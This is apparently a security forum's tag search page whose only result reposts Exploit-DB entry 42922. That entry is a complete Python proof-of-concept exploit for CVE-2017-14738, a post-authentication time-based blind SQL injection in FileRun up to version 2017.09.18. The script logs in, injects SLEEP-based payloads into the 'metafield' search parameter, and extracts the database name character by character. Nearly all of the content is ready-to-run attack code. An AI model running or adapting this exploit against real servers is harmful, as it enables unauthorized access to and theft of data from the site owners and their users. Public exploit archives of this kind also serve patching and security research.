Jump to content

Search the Community

Showing results for tags 'cve-2017-14738'.

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


Forums

  • Informatii generale
    • Anunturi importante
    • Bine ai venit
    • Proiecte RST
  • Sectiunea tehnica
    • Exploituri
    • Challenges (CTF)
    • Bug Bounty
    • Programare
    • Securitate web
    • Reverse engineering & exploit development
    • Mobile security
    • Sisteme de operare si discutii hardware
    • Electronica
    • Wireless Pentesting
    • Black SEO & monetizare
  • Tutoriale
    • Tutoriale in romana
    • Tutoriale in engleza
    • Tutoriale video
  • Programe
    • Programe hacking
    • Programe securitate
    • Programe utile
    • Free stuff
  • Discutii generale
    • RST Market
    • Off-topic
    • Discutii incepatori
    • Stiri securitate
    • Linkuri
    • Cosul de gunoi
  • Club Test's Topics
  • Clubul saraciei absolute's Topics
  • Chernobyl Hackers's Topics
  • Programming & Fun's Jokes / Funny pictures (programming related!)
  • Programming & Fun's Programming
  • Programming & Fun's Programming challenges
  • Bani pă net's Topics
  • Cumparaturi online's Topics
  • Web Development's Forum
  • 3D Print's Topics

Find results in...

Find results that contain...


Date Created

  • Start

    End


Last Updated

  • Start

    End


Filter by number of...

Joined

  • Start

    End


Group


Website URL


Yahoo


Jabber


Skype


Location


Interests


Occupation


Interests


Biography


Location

Found 1 result

  1. EDB-ID: 42922 Author: SPARC Published: 2017-09-29 CVE: CVE-2017-14738 Type: Webapps Platform: PHP E-DB Verified: Exploit: Download / View Raw Vulnerable App: #!/usr/bin/env python # Exploit Title: FileRun <=2017.09.18 # Date: September 29, 2017 # Exploit Author: SPARC # Vendor Homepage: https://www.filerun.com/ # Software Link: http://f.afian.se/wl/?id=EHQhXhXLGaMFU7jI8mYNRN8vWkG9LUVP&recipient=d3d3LmZpbGVydW4uY29t # Version: 2017.09.18 # Tested on: Ubuntu 16.04.3, Apache 2.4.7, PHP 7.0 # CVE : CVE-2017-14738 # import sys,time,urllib,urllib2,cookielib from time import sleep print """ #===============================================================# | | | ___| | | | \___ \ __ \ _ \ __ \ __| _ \ __| _` | | | | | | __/ | | | __/ | ( | | | _____/ .__/ \___|_| _|\__|\___|_| \__,_| | | _| | | | | FileRun <= 2017.09.18 | | BlindSQLi Proof of Concept (Post Authentication) | | by Spentera Research (research[at]spentera.id) | | | #===============================================================# """ host = raw_input("[*] Target IP: ") username = raw_input("[*] Username: ") password = raw_input("[*] Password: ") target = 'http://%s/?module=search&section=ajax&page=grid' %(host) delay=1 global cookie,data def masuk(usr,pswd): log_data = { 'username': usr, 'password': pswd } post_data = urllib.urlencode(log_data) cookjar = cookielib.CookieJar() opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cookjar)) try: req = urllib2.Request('http://%s/?module=fileman&page=login&action=login'%(host), post_data) content = opener.open(req) global data,cookie data = dict((cookie.name, cookie.value) for cookie in cookjar) cookie = ("language=english; FileRunSID=%s"%(data['FileRunSID'])) return str(content.read()) except: print '\n[-] Uh oh! Exploit fail.. PLEASE CHECK YOUR CREDENTIAL' sys.exit(0) def konek(m,n): #borrow from SQLmap :) query=("7) AND (SELECT * FROM (SELECT(SLEEP(%s-(IF(ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),%s,1))>%s,0,1)))))wSmD) AND (8862=8862" %(delay,m,n)) values = { 'metafield': query, 'searchType': 'meta', 'keyword': 'work', 'searchPath': '/ROOT/HOME', 'path': '/ROOT/SEARCH' } req = urllib2.Request(target, urllib.urlencode(values)) req.add_header('Cookie', cookie) try: starttime=time.time() response = urllib2.urlopen(req) endtime = time.time() return int(endtime-starttime) except: print '\n[-] Uh oh! Exploit fail..' sys.exit(0) print "[+] Logging in to the application..." sleep(1) cekmasuk = masuk(username,password) if u'success' in cekmasuk: print "[*] Using Time-Based method with %ds delay."%int(delay) print "[+] Starting to dump current database. This might take time.." sys.stdout.write('[+] Target current database is: ') sys.stdout.flush() starttime = time.time() for m in range(1,256): for n in range(32,126): wkttunggu = konek(m,n) if (wkttunggu < delay): sys.stdout.write(chr(n)) sys.stdout.flush() break endtime = time.time() print "\n[+] Done in %d seconds" %int(endtime-starttime) Source: https://www.exploit-db.com/exploits/42922/
×
×
  • Create New...